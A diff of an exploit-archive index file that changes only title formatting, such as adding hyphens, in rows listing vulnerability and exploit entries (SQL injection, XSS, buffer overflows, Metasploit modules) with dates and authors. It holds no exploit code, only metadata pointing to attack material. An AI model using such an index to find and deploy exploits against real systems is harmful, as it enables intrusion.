Vulnerability",2005-09-29,rgod,php,webapps,0 26308,platforms/php/webapps/26308.txt,"IceWarp Web Mail 5.5.1 blank.html id Parameter XSS",2005-09-30,ss_contacts,php,webapps,0 26309,platforms/php/webapps/26309.txt,"IceWarp Web Mail 5.5.1 calendar_d.html createdataCX Parameter XSS",2005-09-30,ss_contacts,php,webapps,0 @@ -23417,7 +23417,7 @@ id,file,description,date,author,platform,type,port 26341,platforms/windows/dos/26341.txt,"Microsoft Windows 2000/2003/XP MSDTC TIP Denial of Service Vulnerability",2005-10-11,anonymous,windows,dos,0 26342,platforms/linux/dos/26342.txt,"RARLAB WinRar 2.90/3.x UUE/XXE Invalid Filename Error Message Format String",2005-10-11,"Tan Chew Keong",linux,dos,0 26343,platforms/php/webapps/26343.txt,"Accelerated E Solutions SQL Injection Vulnerability",2005-10-11,"Andysheh Soltani",php,webapps,0 -26344,platforms/cgi/webapps/26344.txt,"WebGUI 6.x Arbitrary Command Execution Vulnerability",2005-10-12,"David Maciejak",cgi,webapps,0 +26344,platforms/cgi/webapps/26344.txt,"WebGUI 6.x - Arbitrary Command Execution Vulnerability",2005-10-12,"David Maciejak",cgi,webapps,0 26345,platforms/php/webapps/26345.txt,"YaPig 0.95 b view.php img_size Parameter XSS",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0 26346,platforms/php/webapps/26346.txt,"Accelerated Mortgage Manager Password Field SQL Injection Vulnerability",2005-10-13,imready4chillin,php,webapps,0 26347,platforms/php/webapps/26347.txt,"Gallery 2.0 Main.PHP Directory Traversal Vulnerability",2005-10-14,"Michael Dipper",php,webapps,0 @@ -23474,7 +23474,7 @@ id,file,description,date,author,platform,type,port 26398,platforms/cgi/webapps/26398.txt,"RSA ACE Agent 5.x Image Cross-Site Scripting Vulnerability",2005-10-26,"Bernhard Mueller",cgi,webapps,0 26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Include Vulnerability",2005-10-26,X,php,webapps,0 26400,platforms/php/webapps/26400.txt,"Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-26,Lostmon,php,webapps,0 -26401,platforms/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 Authentication Bypass Vulnerability",2013-06-24,Chako,hardware,webapps,0 +26401,platforms/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 - Authentication Bypass Vulnerability",2013-06-24,Chako,hardware,webapps,0 26402,platforms/windows/local/26402.py,"Mediacoder (.lst) - SEH Buffer Overflow",2013-06-24,metacom,windows,local,0 26403,platforms/windows/local/26403.py,"Mediacoder (.m3u) - SEH Buffer Overflow",2013-06-24,metacom,windows,local,0 26404,platforms/windows/local/26404.py,"MediaCoder PMP Edition 0.8.17 - (.m3u) Buffer Overflow Exploit",2013-06-24,metacom,windows,local,0 @@ -23495,7 +23495,7 @@ id,file,description,date,author,platform,type,port 26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager Arbitary File Upload Vulnerability",2013-06-24,metasploit,php,remote,0 26422,platforms/linux/remote/26422.rb,"MoinMoin twikidraw Action Traversal File Upload",2013-06-24,metasploit,linux,remote,0 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 Bug_sponsorship_list_view_inc.PHP File Include Vulnerability",2005-10-26,"Andreas Sandblad",php,webapps,0 -26424,platforms/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 Arbitrary Command Execution Vulnerability",2005-10-26,"D. Fabian",windows,remote,0 +26424,platforms/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution Vulnerability",2005-10-26,"D. Fabian",windows,remote,0 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x Info-DB Info_db.PHP Multiple SQL Injection Vulnerabilities",2005-10-26,admin@batznet.com,php,webapps,0 26426,platforms/asp/webapps/26426.html,"Techno Dreams Multiple Scripts Multiple SQL Injection Vulnerabilities",2005-10-26,"farhad koosha",asp,webapps,0 26427,platforms/php/webapps/26427.txt,"GCards 1.43 News.PHP SQL Injection Vulnerability",2005-10-26,svsecurity,php,webapps,0 @@ -23507,7 +23507,7 @@ id,file,description,date,author,platform,type,port 26433,platforms/php/webapps/26433.txt,"ATutor 1.x print.php section Parameter Remote File Inclusion",2005-10-27,"Andreas Sandblad",php,webapps,0 26434,platforms/php/webapps/26434.txt,"PBLang 4.65 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-27,abducter,php,webapps,0 26435,platforms/asp/webapps/26435.txt,"ASP Fast Forum Error.ASP Cross-Site Scripting Vulnerability",2005-10-27,syst3m_f4ult,asp,webapps,0 -26436,platforms/php/webapps/26436.txt,"MG2 0.5.1 Authentication Bypass Vulnerability",2005-10-29,"Preben Nylokken",php,webapps,0 +26436,platforms/php/webapps/26436.txt,"MG2 0.5.1 - Authentication Bypass Vulnerability",2005-10-29,"Preben Nylokken",php,webapps,0 26437,platforms/php/webapps/26437.txt,"PHP Advanced Transfer Manager 1.30 - Remote Unauthorized Access Vulnerability",2005-10-29,Zeelock,php,webapps,0 26438,platforms/php/webapps/26438.txt,"Invision Gallery 2.0.3 Index.PHP SQL Injection Vulnerability",2005-10-31,almaster,php,webapps,0 26439,platforms/asp/webapps/26439.txt,"Snitz Forum 2000 Post.ASP Cross-Site Scripting Vulnerability",2005-10-31,h4xorcrew,asp,webapps,0 @@ -23543,7 +23543,7 @@ id,file,description,date,author,platform,type,port 26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 comment.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 news.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 26471,platforms/windows/remote/26471.py,"PCMan's FTP Server 2.0.7 - Buffer Overflow Exploit",2013-06-27,"Jacob Holcomb",windows,remote,21 -26473,platforms/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 Authentication Bypass Vulnerability",2005-11-04,syst3m_f4ult,asp,webapps,0 +26473,platforms/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 - Authentication Bypass Vulnerability",2005-11-04,syst3m_f4ult,asp,webapps,0 26474,platforms/php/webapps/26474.txt,"PHPFM Arbitrary File Upload Vulnerability",2005-11-07,rUnViRuS,php,webapps,0 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail Unauthorized Access Vulnerability",2005-11-07,"Adam Pointon",cgi,webapps,0 26476,platforms/php/webapps/26476.txt,"OSTE 1.0 - Remote File Include Vulnerability",2005-11-07,khc@bsdmail.org,php,webapps,0 @@ -23729,7 +23729,7 @@ id,file,description,date,author,platform,type,port 26662,platforms/php/webapps/26662.php,"N-13 News 1.2 - SQL Injection Vulnerability",2005-11-29,KingOfSka,php,webapps,0 26663,platforms/php/webapps/26663.txt,"DRZES Hms 3.2 - Multiple SQL Injection Vulnerabilities",2005-11-29,r0t,php,webapps,0 26664,platforms/hardware/webapps/26664.txt,"Multiple D-Link Devices - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,hardware,webapps,0 -26665,platforms/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x Authentication Denial of Service Vulnerability",2006-01-17,"David Maciejak",windows,dos,0 +26665,platforms/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x - Authentication Denial of Service Vulnerability",2006-01-17,"David Maciejak",windows,dos,0 26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 Malformed Packet Handling Remote Denial of Service Vulnerability",2005-11-29,"Wernfried Haas",linux,dos,0 26667,platforms/php/webapps/26667.txt,"SocketKB 1.1 Index.PHP SQL Injection Vulnerability",2005-11-30,r0t,php,webapps,0 26668,platforms/php/webapps/26668.txt,"PHPAlbum 0.2.3/4.1 - Local File Include Vulnerability",2005-11-30,r0t3d3Vil,php,webapps,0 @@ -24110,7 +24110,7 @@ id,file,description,date,author,platform,type,port 27051,platforms/windows/dos/27051.txt,"Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0 27052,platforms/php/webapps/27052.txt,"427BB 2.2 Showthread.PHP SQL Injection Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27053,platforms/php/webapps/27053.txt,"Venom Board Post.PHP3 - Multiple SQL Injection Vulnerabilities",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 -27054,platforms/php/webapps/27054.txt,"427BB 2.2 Authentication Bypass Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 +27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass Vulnerability",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95-2004 Malformed Graphic File Code Execution Vulnerability",2006-01-09,ad@heapoverflow.com,windows,dos,0 27056,platforms/linux/local/27056.pl,"Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (1)",2006-01-09,"Breno Silva Pinto",linux,local,0 27057,platforms/linux/local/27057.py,"Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (2)",2006-01-09,"Breno Silva Pinto",linux,local,0 @@ -24189,7 +24189,7 @@ id,file,description,date,author,platform,type,port 27131,platforms/hardware/dos/27131.py,"Galil-RIO Modbus - Denial of Service",2013-07-27,Sapling,hardware,dos,0 27132,platforms/mips/shellcode/27132.txt,"MIPS Little Endian Shellcode",2013-07-27,"Jacob Holcomb",mips,shellcode,0 27133,platforms/mips/remote/27133.py,"ASUS RT-AC66U acsd Param - Remote Root Shell Exploit",2013-07-27,"Jacob Holcomb",mips,remote,0 -27134,platforms/hardware/webapps/27134.pl,"Broadkam PJ871 Authentication Bypass",2013-07-27,d3c0der,hardware,webapps,0 +27134,platforms/hardware/webapps/27134.pl,"Broadkam PJ871 - Authentication Bypass",2013-07-27,d3c0der,hardware,webapps,0 27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution",2013-07-27,metasploit,multiple,remote,8080 27136,platforms/php/webapps/27136.txt,"Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities",2013-07-27,"SEC Consult",php,webapps,0 27137,platforms/php/webapps/27137.txt,"MyBB 1.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-26,imei,php,webapps,0 @@ -24325,7 +24325,7 @@ id,file,description,date,author,platform,type,port 27269,platforms/php/webapps/27269.txt,"Dragonfly CMS 9.0.6.1 - Coppermine Module album Parameter XSS",2006-02-22,Lostmon,php,webapps,0 27271,platforms/windows/remote/27271.rb,"HP Data Protector CMD Install Service Vulnerability (msf)",2013-08-02,"Ben Turner",windows,remote,0 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 -27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode OCX ActiveX Control (TBarCode4.ocx 4.1.0) - Crash PoC",2013-08-02,d3b4g,windows,dos,0 +27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) - Crash PoC",2013-08-02,d3b4g,windows,dos,0 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS (index.php, rang param) - SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez Remote File Upload Vulnerability",2013-08-02,"cr4wl3r ",php,webapps,0 27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Add Admin Account CSRF",2013-08-02,"Yashar shahinzadeh",php,webapps,0 @@ -24354,7 +24354,7 @@ id,file,description,date,author,platform,type,port 27301,platforms/php/webapps/27301.txt,"NOCC 1.0 no_mail.php html_no_mail Parameter XSS",2006-02-23,rgod,php,webapps,0 27302,platforms/php/webapps/27302.txt,"NOCC 1.0 html_bottom_table.php Multiple Parameter XSS",2006-02-23,rgod,php,webapps,0 27303,platforms/php/webapps/27303.txt,"Oi! Email Marketing System 3.0 Index.PHP SQL Injection Vulnerability",2006-02-23,h4cky0u,php,webapps,0 -27304,platforms/php/webapps/27304.html,"CubeCart 3.0.x Arbitrary File Upload Vulnerability",2006-02-23,"NSA Group",php,webapps,0 +27304,platforms/php/webapps/27304.html,"CubeCart 3.0.x - Arbitrary File Upload Vulnerability",2006-02-23,"NSA Group",php,webapps,0 27305,platforms/php/webapps/27305.txt,"PHPX 3.5.9 XCode Tag HTML Injection Vulnerability",2006-02-23,"Thomas Pollet",php,webapps,0 27306,platforms/php/webapps/27306.txt,"JGS-Gallery 4.0 jgs_galerie_slideshow.php Multiple Parameter XSS",2006-02-23,nuker,php,webapps,0 27307,platforms/php/webapps/27307.txt,"JGS-Gallery 4.0 Board jgs_galerie_scroll.php userid Parameter XSS",2006-02-23,nuker,php,webapps,0 @@ -24374,7 +24374,7 @@ id,file,description,date,author,platform,type,port 27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection Vulnerability",2006-02-27,SAUDI,php,webapps,0 27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x galerie_index.php username Parameter XSS",2006-02-27,botan,php,webapps,0 27323,platforms/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x galerie_onfly.php XSS",2006-02-27,botan,php,webapps,0 -27324,platforms/php/webapps/27324.txt,"Archangel Weblog 0.90.2 Authentication Bypass Vulnerability",2006-02-27,KingOfSka,php,webapps,0 +27324,platforms/php/webapps/27324.txt,"Archangel Weblog 0.90.2 - Authentication Bypass Vulnerability",2006-02-27,KingOfSka,php,webapps,0 27325,platforms/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal Vulnerability",2006-02-27,"Donato Ferrante",windows,remote,0 27326,platforms/linux/remote/27326.txt,"MySQL 5.0.18 Query Logging Bypass Vulnerability",2006-02-27,1dt.w0lf,linux,remote,0 27327,platforms/php/webapps/27327.txt,"D3Jeeb Pro 3 fastlinks.php catid Parameter SQL Injection",2006-02-25,SAUDI,php,webapps,0 @@ -24390,7 +24390,7 @@ id,file,description,date,author,platform,type,port 27337,platforms/php/webapps/27337.txt,"Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities",2006-02-28,Crashfr,php,webapps,0 27338,platforms/php/webapps/27338.txt,"PEHEPE Membership Management System 3.0 - Sol_menu.PHP Cross-Site Scripting Vulnerability",2006-02-26,"Yunus Emre Yilmaz",php,webapps,0 27339,platforms/php/webapps/27339.txt,"PEHEPE Membership Management System 3.0 - Remote PHP Script Code Injection Vulnerability",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 -27340,platforms/php/webapps/27340.txt,"SMBlog 1.2 Arbitrary PHP Command Execution Vulnerability",2006-03-01,botan,php,webapps,0 +27340,platforms/php/webapps/27340.txt,"SMBlog 1.2 - Arbitrary PHP Command Execution Vulnerability",2006-03-01,botan,php,webapps,0 27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 Poems.PHP SQL Injection Vulnerability",2006-03-02,sherba,php,webapps,0 27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 forgotten_password.PHP SQL Injection Vulnerability",2006-03-02,"Hamid Ebadi",php,webapps,0 27343,platforms/php/webapps/27343.txt,"VBulletin 3.0/3.5 Profile.PHP Email Field HTML Injection Vulnerability",2006-03-02,imei,php,webapps,0 @@ -24920,7 +24920,7 @@ id,file,description,date,author,platform,type,port 27888,platforms/java/webapps/27888.txt,"Caucho Resin 3.0.17/3.0.18 Viewfile Information Disclosure Vulnerability",2006-05-16,"Joseph Pierini",java,webapps,0 27889,platforms/php/webapps/27889.txt,"BoastMachine 3.1 Admin.PHP Cross-Site Scripting Vulnerability",2006-05-17,"Yunus Emre Yilmaz",php,webapps,0 27890,platforms/asp/webapps/27890.txt,"Open Wiki 0.78 - 'ow.asp' Cross-Site Scripting Vulnerability",2006-05-17,LiNuX_rOOt,asp,webapps,0 -27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 Authentication Bypass Vulnerability",2006-05-17,"Kenneth F. Belva",hardware,remote,0 +27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass Vulnerability",2006-05-17,"Kenneth F. Belva",hardware,remote,0 27892,platforms/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script XSS",2006-05-17,"Jaime Blasco",hardware,remote,0 27893,platforms/hardware/remote/27893.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - events.tar source_ip Parameter XSS",2006-05-17,"Jaime Blasco",hardware,remote,0 27894,platforms/hardware/remote/27894.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - eventplayer get_image_info_abspath Parameter XSS",2006-05-17,"Jaime Blasco",hardware,remote,0 @@ -24931,7 +24931,7 @@ id,file,description,date,author,platform,type,port 27899,platforms/php/webapps/27899.txt,"JemWeb DownloadControl 1.0 DC.PHP SQL Injection Vulnerability",2006-05-19,Luny,php,webapps,0 27900,platforms/php/webapps/27900.txt,"Artmedic Newsletter 4.1 Log.PHP Remote Script Execution Vulnerability",2006-05-19,C.Schmitz,php,webapps,0 27901,platforms/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 Nested Array Objects Denial of Service Vulnerability",2006-05-22,"Marc Schoenefeld",multiple,dos,0 -27902,platforms/linux/remote/27902.txt,"Prodder 0.4 Arbitrary Shell Command Execution Vulnerability",2006-05-22,"RedTeam Pentesting",linux,remote,0 +27902,platforms/linux/remote/27902.txt,"Prodder 0.4 - Arbitrary Shell Command Execution Vulnerability",2006-05-22,"RedTeam Pentesting",linux,remote,0 27903,platforms/linux/dos/27903.txt,"Dia 0.8x/0.9x Filename Remote Format String Vulnerability",2006-05-23,KaDaL-X,linux,dos,0 27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x,DoceboKms 3.0.3,Docebo CMS 3.0.x - Multiple Remote File Include Vulnerabilities",2006-05-23,Kacper,php,webapps,0 27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x Lang Parameter Multiple Remote File Include Vulnerabilities",2006-05-26,beford,php,webapps,0 @@ -25298,7 +25298,7 @@ id,file,description,date,author,platform,type,port 28281,platforms/php/webapps/28281.txt,"phpbb-auction 1.x auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28283,platforms/hardware/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0 -28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0 +28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0 28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability",2006-07-27,hdm,windows,dos,0 28287,platforms/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x Insecure Default Permissions on Shared Memory Vulnerability",2006-07-27,anonymous,linux,local,0 28288,platforms/linux/local/28288.c,"MidiRecord2 MidiRecord.CC Local Buffer Overflow Vulnerability",2006-07-27,"Dedi Dwianto",linux,local,0 @@ -25453,7 +25453,7 @@ id,file,description,date,author,platform,type,port 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 Hlstats.PHP Cross-Site Scripting Vulnerability",2006-08-29,kefka,php,webapps,0 28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Include Vulnerabilities",2006-08-29,sCORPINo,php,webapps,0 28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 Comments.PHP SQL Injection Vulnerability",2006-08-30,Hessam-x,php,webapps,0 -28442,platforms/php/webapps/28442.txt,"LinksCaffe 2.0/3.0 Authentication Bypass Vulnerability",2006-07-25,HoangYenXinhDep,php,webapps,0 +28442,platforms/php/webapps/28442.txt,"LinksCaffe 2.0/3.0 - Authentication Bypass Vulnerability",2006-07-25,HoangYenXinhDep,php,webapps,0 28443,platforms/asp/webapps/28443.html,"Digiappz Freekot 1.01 ASP SQL Injection Vulnerability",2006-08-30,FarhadKey,asp,webapps,0 28444,platforms/php/webapps/28444.txt,"AlstraSoft Template Seller Config[Template_Path] Multiple Remote File Include Vulnerabilities",2006-08-30,night_warrior771,php,webapps,0 28445,platforms/php/webapps/28445.txt,"MyBulletinBoard 1.x Functions_Post.PHP Cross-Site Scripting Vulnerability",2006-08-30,imei,php,webapps,0 @@ -25716,7 +25716,7 @@ id,file,description,date,author,platform,type,port 28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 index.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 process_login.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 -28724,platforms/windows/remote/28724.rb,"SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution",2013-10-04,metasploit,windows,remote,0 +28724,platforms/windows/remote/28724.rb,"SIEMENS Solid Edge ST4 SEListCtrlX - ActiveX Remote Code Execution",2013-10-04,metasploit,windows,remote,0 28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting Vulnerability",2006-09-28,"ILION Research",multiple,remote,0 28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service Vulnerability",2006-09-28,"Noam Rathaus",multiple,dos,0 28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-28,D_7J,php,webapps,0 @@ -25844,7 +25844,7 @@ id,file,description,date,author,platform,type,port 28850,platforms/windows/remote/28850.txt,"Cruiseworks 1.09 Cws.exe Doc Buffer Overflow Vulnerability",2006-10-24,"Tan Chew Keong",windows,remote,0 28851,platforms/php/webapps/28851.txt,"Crafty Syntax Live Help 2.9.9 - Multiple Remote File Include Vulnerabilities",2006-10-24,Crackers_Child,php,webapps,0 28852,platforms/hardware/dos/28852.py,"ONO Hitron CDE-30364 Router - Denial of Service",2013-10-10,"Matias Mingorance Svensson",hardware,dos,80 -28853,platforms/windows/remote/28853.html,"Indusoft Thin Client 7.1 ActiveX - Buffer Overflow",2013-10-10,blake,windows,remote,0 +28853,platforms/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX - Buffer Overflow",2013-10-10,blake,windows,remote,0 28854,platforms/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",multiple,webapps,0 28855,platforms/windows/dos/28855.txt,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow PoC",2013-10-10,metacom,windows,dos,0 28856,platforms/hardware/remote/28856.rb,"Linksys WRT110 - Remote Command Execution",2013-10-10,metasploit,hardware,remote,0 @@ -25875,7 +25875,7 @@ id,file,description,date,author,platform,type,port 28881,platforms/php/webapps/28881.txt,"Foresite CMS Index_2.PHP Cross-Site Scripting Vulnerability",2006-10-30,"David Vieira-Kurz",php,webapps,0 28882,platforms/php/webapps/28882.txt,"phpFaber CMS 1.3.36 Htmlarea.PHP Cross-Site Scripting Vulnerability",2005-10-30,Vigilon,php,webapps,0 28883,platforms/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Include Vulnerabilities",2006-10-31,MEFISTO,php,webapps,0 -28884,platforms/windows/remote/28884.html,"BlooMooWeb 1.0.9 ActiveX Control Multiple Vulnerabilities",2006-10-31,maxgipeh,windows,remote,0 +28884,platforms/windows/remote/28884.html,"BlooMooWeb 1.0.9 - ActiveX Control Multiple Vulnerabilities",2006-10-31,maxgipeh,windows,remote,0 28885,platforms/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module Search.PHP SQL Injection Vulnerability",2006-10-31,Paisterist,php,webapps,0 28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 Configfunction.PHP Remote File Include Vulnerability",2006-10-30,"Cyber Security",php,webapps,0 28887,platforms/java/remote/28887.txt,"Sun Java System 6.x Messenger Express Cross-Site Scripting Vulnerability",2006-10-31,Handrix,java,remote,0 @@ -25907,7 +25907,7 @@ id,file,description,date,author,platform,type,port 28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 Install.PHP3 - Remote File Include Vulnerability",2006-11-06,Mahmood_ali,php,webapps,0 28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 NewList.PHP Cross-Site Scripting Vulnerability",2006-11-06,CvIr.System,php,webapps,0 28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 RSS.PHP SQL Injection Vulnerability",2006-11-06,Liz0ziM,php,webapps,0 -28916,platforms/windows/remote/28916.rb,"America Online ICQ 5.1 ActiveX Control Remote Code Execution Vulnerability",2006-11-06,"Peter Vreugdenhil",windows,remote,0 +28916,platforms/windows/remote/28916.rb,"America Online ICQ 5.1 - ActiveX Control Remote Code Execution Vulnerability",2006-11-06,"Peter Vreugdenhil",windows,remote,0 28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x cp_forum_view.php Multiple Parameter XSS",2006-11-06,"laurent gaffie",php,webapps,0 28918,platforms/php/webapps/28918.txt,"AIOCP 1.3.x cp_dpage.php choosed_language Parameter XSS",2006-11-06,"laurent gaffie",php,webapps,0 28919,platforms/php/webapps/28919.txt,"AIOCP 1.3.x cp_show_ec_products.php order_field Parameter XSS",2006-11-06,"laurent gaffie",php,webapps,0 @@ -26182,7 +26182,7 @@ id,file,description,date,author,platform,type,port 29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow Vulnerability",2006-12-01,kcope,netbsd_x86,dos,0 29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 Index.PHP IMG Parameter SQL Injection Vulnerability",2006-12-01,infection,php,webapps,0 29207,platforms/php/webapps/29207.txt,"deV!Lz Clanportal 1.3.6 Show Parameter SQL Injection Vulnerability",2006-12-01,"Tim Weber",php,webapps,0 -29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 Arbitrary File Upload",2013-10-26,metasploit,php,remote,80 +29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload",2013-10-26,metasploit,php,remote,80 29211,platforms/php/webapps/29211.txt,"WordPress Curvo Themes - CSRF File Upload Vulnerability",2013-10-26,"Byakuya Kouta",php,webapps,0 29213,platforms/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",windows,local,0 29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 QB_Path Parameter Multiple Remote File Include Vulnerabilities",2006-12-27,Shell,php,webapps,0 @@ -26753,7 +26753,7 @@ id,file,description,date,author,platform,type,port 29821,platforms/php/webapps/29821.txt,"Livor 2.5 Index.PHP Cross-Site Scripting Vulnerability",2007-04-06,"Arham Muhammad",php,webapps,0 29822,platforms/linux/local/29822.c,"Man Command -H Flag Local Buffer Overflow Vulnerability",2007-04-06,"Daniel Roethlisberger",linux,local,0 29823,platforms/php/dos/29823.c,"PHP <= 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 -29824,platforms/php/webapps/29824.txt,"QuizShock <= 1.6.1 Auth.PHP HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 +29824,platforms/php/webapps/29824.txt,"QuizShock <= 1.6.1 - Auth.PHP HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 29825,platforms/php/webapps/29825.txt,"UBB.Threads <= 6.1.1 UBBThreads.PHP SQL Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0 29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x AppleTalk ATalk_Sum_SKB Function Denial of Service Vulnerability",2007-04-09,"Jean Delvare",linux,dos,0 29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 Keyboard.PHP Local File Include Vulnerability",2007-04-09,Liz0ziM,php,webapps,0 @@ -26939,7 +26939,7 @@ id,file,description,date,author,platform,type,port 30018,platforms/linux/remote/30018.py,"Python 2.5 PyLocale_strxfrm Function Remote Information Leak Vulnerability",2007-05-08,"Piotr Engelking",linux,remote,0 30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service Vulnerability",2013-12-04,"Neil Kettle",linux,dos,0 -30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x Arbitrary File Read Local Information Disclosure Vulnerability",2007-05-10,anonymous,solaris,local,0 +30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure Vulnerability",2007-05-10,anonymous,solaris,local,0 30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.PHP Cross-Site Scripting 